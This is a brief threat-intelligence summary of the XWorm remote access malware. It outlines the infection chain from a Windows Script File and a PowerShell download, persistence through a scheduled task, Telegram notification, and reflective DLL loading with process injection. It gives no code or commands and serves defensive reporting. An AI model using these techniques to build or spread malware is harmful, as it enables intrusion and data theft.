XWorm: Analysis of Latest Version and Execution Flow
Essential information
- Published
- 03/10/2024 15:16
- Modified
- 03/10/2024 16:21
- Tags
- 2024-10-03 evasion techniques infection chain process injection reflective loading remote access telegram notification xworm
- Related entities
- 8 observables, 10 techniques (mitre), 1 malware
Description
XWorm, a versatile tool discovered in 2022, enables attackers to access sensitive information, gain remote access, and deploy additional malware. The latest version's infection chain begins with a Windows Script File downloading a PowerShell script from paste.ee. This script creates multiple files, establishes persistence through a scheduled task, and notifies the attacker via Telegram. The malware employs evasive techniques, including reflective code loading of a DLL loader, which then injects XWorm into a legitimate process. New features include plugin removal and a network command reporting response time. The analysis covers the entire execution flow, from initial infection to the final payload execution, highlighting the sophisticated nature of this threat.